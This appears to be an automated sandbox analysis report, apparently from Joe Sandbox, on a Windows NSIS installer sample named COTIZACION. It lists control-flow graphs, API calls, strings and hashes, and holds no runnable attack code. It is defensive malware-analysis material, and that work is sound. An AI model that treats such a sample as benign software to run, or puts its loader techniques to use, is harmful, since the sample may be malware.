                                                                                                control_flow_graph 579 405e98-405ea1 580 405ea3-405eb2 579->580 581 405eb4-405ecf 579->581 580->581 582 405ed1-405edc 581->582 583 405ee6-405eed 581->583 582->583 584 405ede-405ee2 582->584 585 4060e1-4060e8 583->585 586 405ef3-405ef6 583->586 584->583 587 4060f3 585->587 588 4060ea-4060f1 call 406af8 585->588 589 405ef7-405f05 586->589 593 4060f5-4060fb 587->593 588->593 590 405f0b-405f16 589->590 591 4060dc-4060e0 589->591 594 4060b5 590->594 595 405f1c-405f60 590->595 591->585 599 4060c3 594->599 600 4060b7-4060c1 594->600 597 406060-406063 595->597 598 405f66-405f77 595->598 603 406065-406068 597->603 604 406099-40609c 597->604 601 405fb7-405fba 598->601 602 405f79-405f97 call 406955 598->602 605 4060c6 599->605 600->605 609 405fca-405fcd 601->609 610 405fbc-405fc8 GetSystemDirectoryW 601->610 615 405f9c-405fa5 602->615 611 406078-40608f call 406af8 603->611 612 40606a-406076 call 4065fd 603->612 607 4060a7-4060b3 lstrlenW 604->607 608 40609e-4060a2 call 405e98 604->608 613 4060c8-4060d6 605->613 607->613 608->607 618 405fdd-405fe5 609->618 619 405fcf-405fdb GetWindowsDirectoryW 609->619 617 406038 610->617 611->607 629 406091-406097 call 406d1b 611->629 612->607 613->589 613->591 622 40603c-406041 615->622 623 405fab-405fb2 call 405e98 615->623 617->622 624 405fe7-405ff0 618->624 625 405ffc-406012 SHGetSpecialFolderLocation 618->625 619->617 630 406043-406046 622->630 631 406054-40605e call 406d1b 622->631 623->622 633 405ff8-405ffa 624->633 627 406014-40602d SHGetPathFromIDListW CoTaskMemFree 625->627 628 40602f-406036 625->628 627->617 627->628 628->617 628->618 629->607 630->631 635 406048-40604e lstrcatW 630->635 631->607 633->617 633->625 635->631
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FC2
                                                                                                  • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                                  • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                                  • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 00405FD5
                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                                • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 004060A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                • API String ID: 4187626192-136800608
                                                                                                • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                                • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                                                • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                                • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 930 405d18-405d24 931 405df5-405df9 930->931 932 405d2a-405d3d 930->932 933 405d49-405d59 lstrlenW 932->933 934 405d3f-405d44 call 405e98 932->934 936 405d5b-405d6a lstrlenW 933->936 937 405d7e 933->937 934->933 938 405d70-405d7c lstrcatW 936->938 939 405df2-405df4 936->939 940 405d83-405d86 937->940 938->940 939->931 941 405d95-405d98 940->941 942 405d88-405d8f SetWindowTextW 940->942 943 405de0-405de2 941->943 944 405d9a-405dde SendMessageW * 3 941->944 942->941 943->939 945 405de4-405dea 943->945 944->943 945->939
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                                                • lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll), ref: 00405D8F
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                                                  • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nszA7D1.tmp\System.dll
                                                                                                • API String ID: 1759915248-3880643226
                                                                                                • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                                • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                                                • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                                • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 946 403148-403181 947 403190-4031a4 call 406926 946->947 948 403183-40318b call 403131 946->948 952 403357 947->952 953 4031aa-4031b0 947->953 948->947 956 403359 952->956 954 4031b6-4031e0 GetTickCount 953->954 955 4032f9-4032fb 953->955 957 4032f1-4032f3 954->957 958 4031e6-4031fd call 40311b 954->958 959 403340-403355 call 40311b 955->959 960 4032fd-4032ff 955->960 961 40335a-403364 956->961 957->961 958->952 968 403203-403211 958->968 959->952 959->957 960->957 964 403301 960->964 967 403306-403316 call 40311b 964->967 967->952 972 403318-403328 call 4069e9 967->972 970 40321b-403237 call 406e86 968->970 977 4032f5-4032f7 970->977 978 40323d-40325d GetTickCount 970->978 979 40332a-403338 972->979 980 40333c-40333e 972->980 977->956 981 4032aa-4032b0 978->981 982 40325f-403268 978->982 979->967 983 40333a 979->983 980->956 986 4032b2-4032b4 981->986 987 4032e9-4032eb 981->987 984 40326a-40326c 982->984 985 40326e-4032a6 MulDiv wsprintfW call 405d18 982->985 983->957 984->981 984->985 985->981 988 4032b6-4032bf call 4069e9 986->988 989 4032ce-4032d6 986->989 987->957 987->958 994 4032c4-4032c6 988->994 992 4032da-4032e1 989->992 992->970 995 4032e7 992->995 994->980 996 4032c8-4032cc 994->996 995->957 996->992
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 004031B6
                                                                                                • GetTickCount.KERNEL32 ref: 00403248
                                                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00403278
                                                                                                • wsprintfW.USER32 ref: 00403289
                                                                                                  • Part of subcall function 00403131: SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountTick$FilePointerwsprintf
                                                                                                • String ID: ... %d%%$<Py
                                                                                                • API String ID: 999035486-2352372732
                                                                                                • Opcode ID: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                                • Instruction ID: cddf24be581f0244f3449d1f5e961e9f445dbb2a95aafc889e314ca9340d81f7
                                                                                                • Opcode Fuzzy Hash: de52eb9ac16236f3fca6093ce857b7e1a1bc104f410f064c541848c7e306c8f4
                                                                                                • Instruction Fuzzy Hash: FD519F702083028BD710DF29DE85B2B7BE8AB84756F14093EFC54F22D1DB38DA048B5A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 997 40617c-40619c GetSystemDirectoryW 998 4061b6 997->998 999 40619e-4061a0 997->999 1000 4061b8 998->1000 999->998 1001 4061a2-4061ad 999->1001 1002 4061bd-4061ea wsprintfW LoadLibraryExW 1000->1002 1001->1000 1003 4061af-4061b4 1001->1003 1003->1002
                                                                                                APIs
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                • wsprintfW.USER32 ref: 004061CF
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                • API String ID: 2200240437-1946221925
                                                                                                • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                                • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                                • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                                • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1004 406a34-406a40 1005 406a41-406a73 GetTickCount GetTempFileNameW 1004->1005 1006 406a75-406a77 1005->1006 1007 406a7e 1005->1007 1006->1005 1008 406a79-406a7c 1006->1008 1009 406a80-406a83 1007->1009 1008->1009
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00406A50
                                                                                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B
                                                                                                Strings
                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                                                • a, xrefs: 00406A49
                                                                                                • n, xrefs: 00406A42
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                                • API String ID: 1716503409-3489432095
                                                                                                • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                                • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                                                • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                                • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1010 4068c4-4068da GetModuleHandleA 1011 4068e6-4068ee GetProcAddress 1010->1011 1012 4068dc-4068dd call 40617c 1010->1012 1014 4068f4-4068f6 1011->1014 1015 4068e2-4068e4 1012->1015 1015->1011 1015->1014
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                                  • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                  • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                                  • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                                • API String ID: 2547128583-890815371
                                                                                                • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                                • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                                • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                                • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1016 405e1c-405e65 CreateDirectoryW 1017 405e67-405e72 GetLastError 1016->1017 1018 405e8a-405e8c 1016->1018 1019 405e94-405e95 1017->1019 1020 405e74-405e88 SetFileSecurityW 1017->1020 1018->1019 1020->1018 1021 405e8e GetLastError 1020->1021 1021->1019
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                                                • GetLastError.KERNEL32 ref: 00405E67
                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                                                • GetLastError.KERNEL32 ref: 00405E8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                • String ID:
                                                                                                • API String ID: 3449924974-0
                                                                                                • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                                • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                                                • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                                • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1022 406955-406988 call 4062b6 1025 4069c7-4069c9 1022->1025 1026 40698a-4069b9 RegQueryValueExW RegCloseKey 1022->1026 1028 4069cc-4069ce 1025->1028 1026->1025 1027 4069bb-4069bf 1026->1027 1027->1028 1029 4069c1-4069c5 1027->1029 1029->1025 1029->1028
                                                                                                APIs
                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                                                • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
